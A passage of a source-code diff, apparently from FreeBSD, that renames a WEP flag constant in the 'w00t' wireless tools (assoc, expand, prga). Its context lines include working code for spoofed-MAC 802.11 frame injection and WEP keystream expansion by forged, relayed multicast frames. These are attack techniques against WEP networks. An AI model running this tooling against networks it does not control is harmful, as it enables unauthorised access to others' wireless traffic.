p->rx : p->tap; if (select(max+1, &fds, NULL, NULL, &to) == -1) err(1, "select()"); if (FD_ISSET(p->tap, &fds)) read_tap(p); if (FD_ISSET(p->rx, &fds)) read_wifi(p); } int main(int argc, char *argv[]) { char *iface = "wlan0"; char *tap = "tap0"; struct params p; int ch; /* default params */ memset(&p, 0, sizeof(p)); memcpy(p.mac, "\x00\x00\xde\xfa\xce\x0d", 6); strcpy(p.ssid, "sorbo"); p.bint = 500*1000; p.seq = getpid(); if (gettimeofday(&p.blast, NULL) == -1) err(1, "gettimeofday()"); p.chan = 3; while ((ch = getopt(argc, argv, "hi:s:m:w:c:t:")) != -1) { switch (ch) { case 'i': iface = optarg; break; case 't': tap = optarg; break; case 'c': p.chan = atoi(optarg); break; case 's': strncpy(p.ssid, optarg, sizeof(p.ssid)-1); p.ssid[sizeof(p.ssid)-1] = 0; break; case 'm': str2mac(p.mac, optarg); break; case 'w': if (str2wep(p.wep_key, &p.wep_len, optarg)) { printf("Error parsing WEP key\n"); exit(1); } break; case 'h': default: usage(argv[0]); break; } } /* init */ if ((p.tx = open_tx(iface)) == -1) err(1, "open_tx()"); if ((p.rx = open_rx(iface)) == -1) err(1, "open_rx()"); if ((p.tap = open_tap(tap)) == -1) err(1, "open_tap()"); if (set_iface_mac(tap, p.mac) == -1) err(1, "set_iface_mac()"); while (1) { next_event(&p); } exit(0); } diff --git a/tools/tools/net80211/w00t/assoc/assoc.c b/tools/tools/net80211/w00t/assoc/assoc.c index 79aaef681881..345c31570474 100644 --- a/tools/tools/net80211/w00t/assoc/assoc.c +++ b/tools/tools/net80211/w00t/assoc/assoc.c @@ -1,938 +1,938 @@ /*- * Copyright (c) 2006, Andrea Bittau * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
* * $FreeBSD$ */ #include #include #include #include #include #include #include #include #include #include "w00t.h" enum { S_START = 0, S_SEND_PROBE_REQ, S_WAIT_PROBE_RES, S_SEND_AUTH, S_WAIT_AUTH, S_SEND_ASSOC, S_WAIT_ASSOC, S_ASSOCIATED, S_SEND_DATA, S_WAIT_ACK }; struct params { int seq; int seq_rx; char *mac; char *ssid; char bssid[6]; char ap[6]; int tx; int rx; int tap; int aid; char packet[4096]; int packet_len; int state; char wep_key[13]; int wep_iv; int wep_len; }; void usage(char *pname) { printf("Usage: %s \n" "-m\t\n" "-s\t\n" "-h\tusage\n" "-i\t\n" "-w\t\n" "-t\t\n" "-b\t\n" , pname); exit(0); } void fill_basic(struct ieee80211_frame *wh, struct params *p) { short *seq; wh->i_dur[0] = 0x69; wh->i_dur[1] = 0x00; memcpy(wh->i_addr1, p->ap, 6); memcpy(wh->i_addr2, p->mac, 6); memcpy(wh->i_addr3, p->bssid, 6); seq = (short*)wh->i_seq; *seq = seqfn(p->seq, 0); } void send_frame(struct params *p, void *buf, int len) { int rc; rc = inject(p->tx, buf, len); if (rc == -1) { if (errno == EMSGSIZE) warnx("inject(len %d)", len); else err(1, "inject(len %d)", len); } else if (rc != len) errx(1, "injected %d but only %d sent", rc, len); p->seq++; } void send_probe_request(struct params *p) { char buf[2048]; struct ieee80211_frame *wh; char *data; int len; memset(buf, 0, sizeof(buf)); wh = (struct ieee80211_frame*) buf; fill_basic(wh, p); wh->i_fc[0] |= IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_PROBE_REQ; memset(wh->i_addr1, 0xFF, 6); memset(wh->i_addr3, 0xFF, 6); data = (char*) (wh + 1); *data++ = 0; /* SSID */ *data++ = strlen(p->ssid); strcpy(data, p->ssid); data += strlen(p->ssid); *data++ = 1; /* rates */ *data++ = 4; *data++ = 2 | 0x80; *data++ = 4 | 0x80; *data++ = 11; *data++ = 22; len = data - (char*)wh; send_frame(p, buf, len); } void send_auth(struct params *p) { char buf[2048]; struct ieee80211_frame *wh; char *data; int len; memset(buf, 0, sizeof(buf)); wh = (struct ieee80211_frame*) buf; fill_basic(wh, p); wh->i_fc[0] |= IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_AUTH; data = (char*) (wh + 1); /* algo */ *data++ = 0; *data++ = 0; /* transaction no. */ *data++ = 1; *data++ = 0; /* status code */ *data++ = 0; *data++ = 0; len = data - (char*)wh; send_frame(p, buf, len); } /* * Add an ssid element to a frame. 
*/ static u_int8_t * ieee80211_add_ssid(u_int8_t *frm, const u_int8_t *ssid, u_int len) { *frm++ = IEEE80211_ELEMID_SSID; *frm++ = len; memcpy(frm, ssid, len); return frm + len; } void send_assoc(struct params *p) { union { struct ieee80211_frame w; char buf[2048]; } u; struct ieee80211_frame *wh; char *data; int len, capinfo, lintval; memset(&u, 0, sizeof(u)); wh = (struct ieee80211_frame*) &u.w; fill_basic(wh, p); wh->i_fc[0] |= IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_ASSOC_REQ; data = (char*) (wh + 1); /* capability */ capinfo = IEEE80211_CAPINFO_ESS; if (p->wep_len) capinfo |= IEEE80211_CAPINFO_PRIVACY; *(uint16_t *)data = htole16(capinfo); data += 2; /* listen interval */ *(uint16_t *)data = htole16(100); data += 2; data = ieee80211_add_ssid(data, p->ssid, strlen(p->ssid)); *data++ = 1; /* rates */ *data++ = 4; *data++ = 2 | 0x80; *data++ = 4 | 0x80; *data++ = 11; *data++ = 22; len = data - (char*)wh; send_frame(p, u.buf, len); } int for_me(struct ieee80211_frame *wh, char *mac) { return memcmp(wh->i_addr1, mac, 6) == 0; } int from_ap(struct ieee80211_frame *wh, char *mac) { return memcmp(wh->i_addr2, mac, 6) == 0; } void ack(struct params *p, struct ieee80211_frame *wh) { if (memcmp(wh->i_addr1, p->mac, 6) != 0) return; if ((wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_CTL) return; send_ack(p->tx, wh->i_addr2); } void generic_process(struct ieee80211_frame *wh, struct params *p, int len) { int type, stype; int dup = 0; #if 0 ack(p, wh); #endif #if 0 if (!for_me(wh, p->mac)) return; #endif /* ignore my own shit */ if (memcmp(wh->i_addr2, p->mac, 6) == 0) { return; } type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; stype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; if (for_me(wh, p->mac) && type == IEEE80211_FC0_TYPE_DATA) { /* sequence number & dups */ if (p->seq_rx == -1) p->seq_rx = seqno(wh); else { int s = seqno(wh); if (s > p->seq_rx) { /* normal case */ if (p->seq_rx + 1 == s) { #if 0 printf("S=%d\n", s); #endif p->seq_rx = s; } else { /* future */ #if 0 printf("Got seq %d, prev %d\n", s, p->seq_rx); #endif p->seq_rx = s; } } else { /* we got pas stuff... */ if (p->seq_rx - s > 1000) { #if 0 printf("Seqno wrap seq %d, last %d\n", s, p->seq_rx); #endif /* seqno wrapping ? 
*/ p->seq_rx = 0; } else { /* dup */ dup = 1; #if 0 printf("Got dup seq %d, last %d\n", s, p->seq_rx); #endif } } } } #if 0 if (wh->i_fc[1] & IEEE80211_FC1_RETRY) { printf("Got retry\n"); } #endif #if 0 if ((wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) != IEEE80211_FC0_TYPE_CTL) { int rc = send_ack(p->tx, wh->i_addr2); if (rc == -1) err(1, "send_ack()"); if (rc != 10) { printf("Wrote ACK %d/%d\n", rc, 10); exit(1); } } #endif /* data frames */ if (type == IEEE80211_FC0_TYPE_DATA && !dup) { char *ptr; char src[6], dst[6]; int rc; if (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) { if (memcmp(wh->i_addr2, p->ap, 6) != 0) return; } else { if (memcmp(wh->i_addr1, p->ap, 6) != 0) return; } if (p->state < S_ASSOCIATED) { printf("Got data when not associated!\n"); return; } if (stype != IEEE80211_FC0_SUBTYPE_DATA) { printf("Got weird data frame stype=%d\n", stype >> IEEE80211_FC0_SUBTYPE_SHIFT); return; } if (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) { memcpy(src, wh->i_addr3, 6); memcpy(dst, wh->i_addr1, 6); } else { memcpy(src, wh->i_addr2, 6); memcpy(dst, wh->i_addr3, 6); } ptr = (char*) (wh + 1); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { if (!p->wep_len) { char srca[3*6]; char dsta[3*6]; mac2str(srca, src); mac2str(dsta, dst); printf("Got wep but i aint wep %s->%s %d\n", srca, dsta, len-sizeof(*wh)-8); return; } if (wep_decrypt(wh, len, p->wep_key, p->wep_len) == -1){ char srca[3*6]; char dsta[3*6]; mac2str(srca, src); mac2str(dsta, dst); printf("Can't decrypt %s->%s %d\n", srca, dsta, len-sizeof(*wh)-8); return; } ptr += 4; len -= 8; } /* ether header */ ptr += 8 - 2; ptr -= 6; memcpy(ptr, src, 6); ptr -= 6; memcpy(ptr, dst, 6); len -= sizeof(*wh); len -= 8; len += 14; /* send to tap */ rc = write(p->tap, ptr, len); if (rc == -1) err(1, "write()"); if (rc != len) { printf("Wrote %d/%d\n", rc, len); exit(1); } } } int get_probe_response(struct params *p) { char buf[4096]; int rc; struct ieee80211_frame *wh; char *data; int ess; int wep; char *ssid; char from[18]; char bssid[18]; rc = sniff(p->rx, buf, sizeof(buf)); if (rc == -1) err(1, "sniff()"); wh = get_wifi(buf, &rc); if (!wh) return 0; generic_process(wh, p, rc); if (!for_me(wh, p->mac)) return 0; if (!frame_type(wh, IEEE80211_FC0_TYPE_MGT, IEEE80211_FC0_SUBTYPE_PROBE_RESP)) return 0; data = (char*) (wh+1); data += 8; /* Timestamp */ data += 2; /* Beacon Interval */ ess = *data & 1; wep = (*data & IEEE80211_CAPINFO_PRIVACY) ? 1 : 0; data += 2; /* capability */ /* ssid */ if (*data != 0) { printf("Warning, expecting SSID got %x\n", *data); return 0; } data++; ssid = data+1; data += 1 + *data; if (*data != 1) { printf("Warning, expected rates got %x\n", *data); return 0; } *data = 0; /* rates */ data++; mac2str(from, wh->i_addr2); mac2str(bssid, wh->i_addr3); printf("Got response from %s [%s] [%s] ESS=%d WEP=%d\n", from, bssid, ssid, ess, wep); if (strcmp(ssid, p->ssid) != 0) return 0; memcpy(p->ap, wh->i_addr2, 6); memcpy(p->bssid, wh->i_addr3, 6); return 1; } int get_auth(struct params *p) { char buf[4096]; int rc; struct ieee80211_frame *wh; short *data; rc = sniff(p->rx, buf, sizeof(buf)); if (rc == -1) err(1, "sniff()"); wh = get_wifi(buf, &rc); if (!wh) return 0; generic_process(wh, p, rc); if (!for_me(wh, p->mac)) return 0; if (!from_ap(wh, p->ap)) return 0; if (!frame_type(wh, IEEE80211_FC0_TYPE_MGT, IEEE80211_FC0_SUBTYPE_AUTH)) return 0; data = (short*) (wh+1); /* algo */ if (le16toh(*data) != 0) { printf("Not open-system %d!\n", le16toh(*data)); return 0; } data++; /* transaction no. 
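* (in open-system authentication the request carries transaction sequence
* number 1 and the AP's reply carries 2, which is what is checked below)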
*/ if (le16toh(*data) != 2) { printf("Got transaction %d!\n", le16toh(*data)); return 0; } data++; /* status code */ rc = le16toh(*data); if (rc == 0) { printf("Authenticated\n"); return 1; } printf("Authentication failed code=%d\n", rc); return 0; } int get_assoc(struct params *p) { char buf[4096]; int rc; struct ieee80211_frame *wh; unsigned short *data; rc = sniff(p->rx, buf, sizeof(buf)); if (rc == -1) err(1, "sniff()"); wh = get_wifi(buf, &rc); if (!wh) return 0; generic_process(wh, p, rc); if (!for_me(wh, p->mac)) return 0; if (!from_ap(wh, p->ap)) return 0; if (!frame_type(wh, IEEE80211_FC0_TYPE_MGT, IEEE80211_FC0_SUBTYPE_ASSOC_RESP)) return 0; data = (unsigned short*) (wh+1); data++; /* caps */ /* status */ rc = le16toh(*data++); if (rc != 0) { printf("Assoc failed code %d\n", rc); return 0; } /* aid */ p->aid = le16toh(*data & ~( (1 << 15) | (1 << 14))); printf("Association ID=%d\n", p->aid); return 1; } void read_wifi(struct params *p) { char buf[4096]; int rc; struct ieee80211_frame *wh; int type, stype; rc = sniff(p->rx, buf, sizeof(buf)); if (rc == -1) err(1, "sniff()"); wh = get_wifi(buf, &rc); if (!wh) return; generic_process(wh, p, rc); if (!for_me(wh, p->mac)) return; type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; stype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; /* control frames */ if (type == IEEE80211_FC0_TYPE_CTL) { switch (stype) { case IEEE80211_FC0_SUBTYPE_ACK: if (p->state == S_WAIT_ACK) p->state = S_ASSOCIATED; break; case IEEE80211_FC0_SUBTYPE_RTS: #if 0 printf("Got RTS\n"); #endif break; default: printf("Unknown CTL frame %d\n", stype >> IEEE80211_FC0_SUBTYPE_SHIFT); abort(); break; } return; } if (!from_ap(wh, p->ap)) return; if (type != IEEE80211_FC0_TYPE_MGT) return; if (stype == IEEE80211_FC0_SUBTYPE_DEAUTH || stype == IEEE80211_FC0_SUBTYPE_DISASSOC) { printf("Got management! 
%d\n", stype >> IEEE80211_FC0_SUBTYPE_SHIFT); p->seq_rx = -1; p->state = S_START; } return; } void read_tap(struct params *p) { char *ptr; int len = sizeof(p->packet); int offset; char mac[6]; struct ieee80211_frame *wh; ptr = p->packet; offset = sizeof(struct ieee80211_frame) + 8 - 14; if (p->wep_len) offset += 4; ptr += offset; len -= offset; /* read packet */ memset(p->packet, 0, sizeof(p->packet)); p->packet_len = read(p->tap, ptr, len); if (p->packet_len == -1) err(1, "read()"); /* 802.11 header */ wh = (struct ieee80211_frame*) p->packet; memcpy(mac, ptr, sizeof(mac)); fill_basic(wh, p); memcpy(wh->i_addr3, mac, sizeof(wh->i_addr3)); wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA; wh->i_fc[1] |= IEEE80211_FC1_DIR_TODS; if (p->wep_len) - wh->i_fc[1] |= IEEE80211_FC1_WEP; + wh->i_fc[1] |= IEEE80211_FC1_PROTECTED; /* LLC & SNAP */ ptr = (char*) (wh+1); if (p->wep_len) ptr += 4; *ptr++ = 0xAA; *ptr++ = 0xAA; *ptr++ = 0x03; *ptr++ = 0x00; *ptr++ = 0x00; *ptr++ = 0x00; /* ether type overlaps w00t */ p->packet_len += offset; /* WEP */ if (p->wep_len) { ptr = (char*) (wh+1); memcpy(ptr, &p->wep_iv, 3); ptr[3] = 0; p->wep_iv++; wep_encrypt(wh, p->packet_len, p->wep_key, p->wep_len); p->packet_len += 4; /* ICV */ } } int main(int argc, char *argv[]) { char* ssid = 0; char mac[] = { 0x00, 0x00, 0xde, 0xfa, 0xce, 0xd }; int ch; struct params p; char *iface = "wlan0"; char *tap = "tap0"; int timeout = 50*1000; struct timeval start; memset(&p, 0, sizeof(p)); p.wep_len = 0; p.wep_iv = 0; p.state = S_START; while ((ch = getopt(argc, argv, "hm:s:i:w:t:b:")) != -1) { switch (ch) { case 'b': if (str2mac(p.bssid, optarg)) { printf("Error parsing BSSID\n"); exit(1); } memcpy(p.ap, p.bssid, sizeof(p.ap)); p.state = S_SEND_AUTH; break; case 's': ssid = optarg; break; case 'm': if (str2mac(mac, optarg)) { printf("Error parsing MAC\n"); exit(1); } break; case 'i': iface = optarg; break; case 'w': if (str2wep(p.wep_key, &p.wep_len, optarg)) { printf("Error parsing WEP key\n"); exit(1); } break; case 't': tap = optarg; break; case 'h': default: usage(argv[0]); break; } } if (!ssid) usage(argv[0]); p.mac = mac; p.ssid = ssid; p.seq = getpid(); p.seq_rx = -1; if (open_rxtx(iface, &p.rx, &p.tx) == -1) err(1, "open_rxtx()"); p.tap = open_tap(tap); if (p.tap == -1) err(1, "open_tap()"); if (set_iface_mac(tap, mac) == -1) err(1, "set_iface_mac()"); while (1) { /* check for timeouts */ switch (p.state) { case S_WAIT_PROBE_RES: case S_WAIT_AUTH: case S_WAIT_ASSOC: case S_WAIT_ACK: do { int rc; struct timeval tv; int elapsed = 0; /* check timeout */ if (gettimeofday(&tv, NULL) == -1) err(1, "gettimeofday()"); elapsed = tv.tv_sec - start.tv_sec; if (elapsed == 0) { elapsed = tv.tv_usec - start.tv_usec; } else { elapsed *= (elapsed-1)*1000*1000; elapsed += 1000*1000 - start.tv_usec; elapsed += tv.tv_usec; } if (elapsed >= timeout) rc = 0; else { fd_set fds; FD_ZERO(&fds); FD_SET(p.rx, &fds); elapsed = timeout - elapsed; tv.tv_sec = elapsed/1000/1000; elapsed -= tv.tv_sec*1000*1000; tv.tv_usec = elapsed; rc = select(p.rx+1, &fds, NULL, NULL, &tv); if (rc == -1) err(1, "select()"); } /* timeout */ if (!rc) { #if 0 printf("Timeout\n"); #endif p.state--; } } while(0); break; } switch (p.state) { case S_START: p.state = S_SEND_PROBE_REQ; break; case S_SEND_PROBE_REQ: printf("Sending probe request for %s\n", ssid); send_probe_request(&p); p.state = S_WAIT_PROBE_RES; if (gettimeofday(&start, NULL) == -1) err(1, "gettimeofday()"); break; case S_WAIT_PROBE_RES: if (get_probe_response(&p)) { p.state = S_SEND_AUTH; } break; case 
S_SEND_AUTH: do { char apmac[18]; mac2str(apmac, p.ap); printf("Sending auth to %s\n", apmac); send_auth(&p); p.state = S_WAIT_AUTH; if (gettimeofday(&start, NULL) == -1) err(1, "gettimeofday()"); } while(0); break; case S_WAIT_AUTH: if (get_auth(&p)) { p.state = S_SEND_ASSOC; } break; case S_SEND_ASSOC: printf("Sending assoc\n"); send_assoc(&p); p.state = S_WAIT_ASSOC; if (gettimeofday(&start, NULL) == -1) err(1, "gettimeofday()"); break; case S_WAIT_ASSOC: if (get_assoc(&p)) { printf("Associated\n"); p.state = S_ASSOCIATED; } break; case S_ASSOCIATED: do { fd_set fds; int max; FD_ZERO(&fds); FD_SET(p.rx, &fds); FD_SET(p.tap, &fds); max = (p.rx > p.tap) ? p.rx : p.tap; max = select(max+1, &fds, NULL, NULL, NULL); if (max == -1) err(1, "select()"); if (FD_ISSET(p.tap, &fds)) { read_tap(&p); p.state = S_SEND_DATA; } if (FD_ISSET(p.rx, &fds)) { read_wifi(&p); } } while(0); break; case S_SEND_DATA: send_frame(&p, p.packet, p.packet_len); do { struct ieee80211_frame *wh; wh = (struct ieee80211_frame*) p.packet; wh->i_fc[1] |= IEEE80211_FC1_RETRY; } while (0); p.state = S_WAIT_ACK; if (gettimeofday(&start, NULL) == -1) err(1, "gettimeofday()"); break; case S_WAIT_ACK: read_wifi(&p); break; default: printf("Unknown state %d\n", p.state); abort(); break; } } exit(0); } diff --git a/tools/tools/net80211/w00t/expand/expand.c b/tools/tools/net80211/w00t/expand/expand.c index f2827d9b5245..64bff9990cbc 100644 --- a/tools/tools/net80211/w00t/expand/expand.c +++ b/tools/tools/net80211/w00t/expand/expand.c @@ -1,468 +1,468 @@ /*- * Copyright (c) 2006, Andrea Bittau * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
* * $FreeBSD$ */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "w00t.h" enum { S_START = 0, S_WAIT_RELAY, }; struct queue { struct ieee80211_frame *wh; int len; char *buf; int live; struct queue *next; }; struct params { int rx; int tx; int tap; char mcast[5]; char mac[6]; char ap[6]; char prga[2048]; int prga_len; int state; struct queue *q; char packet[2048]; int packet_len; struct timeval last; int seq; unsigned char guess; }; int wanted(struct params *p, struct ieee80211_frame *wh, int len) { char *bssid, *sa; if (wh->i_fc[1] & IEEE80211_FC1_DIR_TODS) { bssid = wh->i_addr1; sa = wh->i_addr2; } else { bssid = wh->i_addr2; sa = wh->i_addr3; } if (memcmp(bssid, p->ap, 6) != 0) return 0; - if (!(wh->i_fc[1] & IEEE80211_FC1_WEP)) { + if (!(wh->i_fc[1] & IEEE80211_FC1_PROTECTED)) { printf("Got non WEP packet...\n"); return 0; } /* my own shit */ if (memcmp(p->mac, sa, 6) == 0) return 0; return 1; } void enque(struct params *p, char **buf, struct ieee80211_frame *wh, int len) { struct queue *q = p->q; int qlen = 0; char *ret = NULL; struct queue *last = NULL; /* find a slot */ while (q) { if (q->live) qlen++; else { /* recycle */ ret = q->buf; break; } last = q; q = q->next; } /* need to create slot */ if (!q) { q = (struct queue*) malloc(sizeof(*q)); if (!q) err(1, "malloc()"); memset(q, 0, sizeof(*q)); /* insert */ if (!p->q) p->q = q; else { assert(last); last->next = q; } } q->live = 1; q->buf = *buf; q->len = len; q->wh = wh; qlen++; if (qlen > 5) printf("Enque. Size: %d\n", qlen); *buf = ret; } void send_packet(struct params *p) { int rc; rc = inject(p->tx, p->packet, p->packet_len); if (rc == -1) err(1, "inject()"); if (rc != p->packet_len) { printf("Wrote %d/%d\n", rc, p->packet_len); exit(1); } if (gettimeofday(&p->last, NULL) == -1) err(1, "gettimeofday()"); } #include void send_mcast(struct params *p, unsigned char x) { struct ieee80211_frame *wh; short *seq; struct queue *q = p->q; char *data, *ptr; int len; uLong crc = crc32(0L, Z_NULL, 0); uLong *pcrc; int i; int need_frag = 0; char payload[10] = "\xAA\xAA\x03\x00\x00\x00\x08\x06\x00\x00"; assert(q); /* 802.11 */ memset(p->packet, 0, sizeof(p->packet)); wh = (struct ieee80211_frame*) p->packet; wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA; wh->i_fc[0] |= IEEE80211_FC0_SUBTYPE_DATA; wh->i_fc[1] |= IEEE80211_FC1_DIR_TODS; - wh->i_fc[1] |= IEEE80211_FC1_WEP; + wh->i_fc[1] |= IEEE80211_FC1_PROTECTED; wh->i_dur[0] = 0x69; memcpy(wh->i_addr1, p->ap, 6); memcpy(wh->i_addr2, p->mac, 6); memcpy(wh->i_addr3, p->mcast, 5); wh->i_addr3[5] = x; seq = (short*) wh->i_seq; *seq = seqfn(p->seq++, 0); /* IV */ data = (char*) (wh+1); ptr = (char*) (q->wh+1); memcpy(data, ptr, 3); if (p->prga_len == 0) { RC4_KEY k; unsigned char key[8]; memset(&key[3], 0x61, 5); memcpy(key, (q->wh+1), 3); p->prga_len = 128; RC4_set_key(&k, 8, key); memset(p->prga, 0, sizeof(p->prga)); RC4(&k, p->prga_len, p->prga, p->prga); #if 0 int ptl = q->len; char *pt; pt = known_pt(q->wh, &ptl); ptr += 4; p->prga_len = ptl; for (i = 0; i < p->prga_len; i++) p->prga[i] = ptr[i] ^ pt[i]; #endif } /* data */ data += 4; memcpy(data, payload, sizeof(payload)); p->prga_len = 12; len = p->prga_len + 1 - 4; #if 1 if (len < sizeof(payload)) { need_frag = len; wh->i_fc[1] |= IEEE80211_FC1_MORE_FRAG; } #endif /* crc */ pcrc = (uLong*) (data+len); *pcrc = crc32(crc, data, len); /* wepify */ len += 4; for (i = 0; i < (len); i++) { assert( i <= p->prga_len); data[i] ^= p->prga[i]; } // 
data[i] ^= x; len += sizeof(*wh); p->packet_len = len + 4; send_packet(p); /* the data we sent is too fucking short */ if (need_frag) { memset(data, 0, len); /* 802.11 */ *seq = seqfn(p->seq-1, 1); wh->i_fc[1] &= ~IEEE80211_FC1_MORE_FRAG; /* data */ len = sizeof(payload) - need_frag; assert(len > 0 && len <= (p->prga_len - 4)); memcpy(data, &payload[need_frag], len); /* crc */ crc = crc32(0L, Z_NULL, 0); len = p->prga_len - 4; pcrc = (uLong*) (data+len); *pcrc = crc32(crc, data, len); /* wepify */ len += 4; for (i = 0; i < len; i++) { assert( i < p->prga_len); data[i] ^= p->prga[i]; } len += sizeof(*wh) + 4; p->packet_len = len; send_packet(p); } } void send_queue(struct params *p) { struct queue *q = p->q; int i; assert(q); assert(q->live); for (i = 0; i < 5; i++) { send_mcast(p, p->guess++); } p->state = S_WAIT_RELAY; } void got_mcast(struct params *p, struct ieee80211_frame *wh, int len) { printf("ao\n"); } void read_wifi(struct params *p) { static char *buf = 0; static int buflen = 4096; struct ieee80211_frame *wh; int rc; if (!buf) { buf = (char*) malloc(buflen); if (!buf) err(1, "malloc()"); } rc = sniff(p->rx, buf, buflen); if (rc == -1) err(1, "sniff()"); wh = get_wifi(buf, &rc); if (!wh) return; /* relayed macast */ if (frame_type(wh, IEEE80211_FC0_TYPE_DATA, IEEE80211_FC0_SUBTYPE_DATA) && (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) && (memcmp(wh->i_addr2, p->ap, 6) == 0) && (memcmp(wh->i_addr1, p->mcast, 5) == 0) && (memcmp(p->mac, wh->i_addr3, 6) == 0)) { got_mcast(p, wh, rc); return; } /* data */ if (frame_type(wh, IEEE80211_FC0_TYPE_DATA, IEEE80211_FC0_SUBTYPE_DATA)) { if (!wanted(p, wh, rc)) return; enque(p, &buf, wh, rc); if (p->state == S_START) send_queue(p); return; } } void own(struct params *p) { struct timeval tv; struct timeval *to = NULL; fd_set fds; int tout = 10*1000; if (p->state == S_WAIT_RELAY) { int el; /* check timeout */ if (gettimeofday(&tv, NULL) == -1) err(1, "gettimeofday()"); el = elapsed(&p->last, &tv); /* timeout */ if (el >= tout) { if (p->q && p->q->live) { send_queue(p); el = 0; } else { p->state = S_START; return; } } el = tout - el; tv.tv_sec = el/1000/1000; tv.tv_usec = el - tv.tv_sec*1000*1000; to = &tv; } FD_ZERO(&fds); FD_SET(p->rx, &fds); if (select(p->rx+1, &fds, NULL, NULL, to) == -1) err(1, "select()"); if (FD_ISSET(p->rx, &fds)) read_wifi(p); } void usage(char *name) { printf("Usage %s \n" "-h\thelp\n" "-b\t\n" "-t\t\n" , name); exit(1); } int main(int argc, char *argv[]) { struct params p; char *iface = "wlan0"; char *tap = "tap0"; int ch; memset(&p, 0, sizeof(p)); memcpy(p.mac, "\x00\x00\xde\xfa\xce\xd", 6); p.seq = getpid(); memcpy(p.mcast, "\x01\x00\x5e\x00\x00", 5); while ((ch = getopt(argc, argv, "hb:t:")) != -1) { switch (ch) { case 't': tap = optarg; break; case 'b': if (str2mac(p.ap, optarg) == -1) { printf("Can't parse BSSID\n"); exit(1); } break; case 'h': default: usage(argv[0]); break; } } if ((p.rx = open_rx(iface)) == -1) err(1, "open_rx()"); if ((p.tx = open_tx(iface)) == -1) err(1, "open_tx()"); if ((p.tap = open_tap(tap)) == -1) err(1, "open_tap()"); if (set_iface_mac(tap, p.mac) == -1) err(1, "set_iface_mac()"); p.state = S_START; while (1) own(&p); exit(0); } diff --git a/tools/tools/net80211/w00t/prga/prga.c b/tools/tools/net80211/w00t/prga/prga.c index 173dde787f9e..c75d20f94f6a 100644 --- a/tools/tools/net80211/w00t/prga/prga.c +++ b/tools/tools/net80211/w00t/prga/prga.c @@ -1,664 +1,664 @@ /*- * Copyright (c) 2006, Andrea Bittau * All rights reserved. 
* * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, 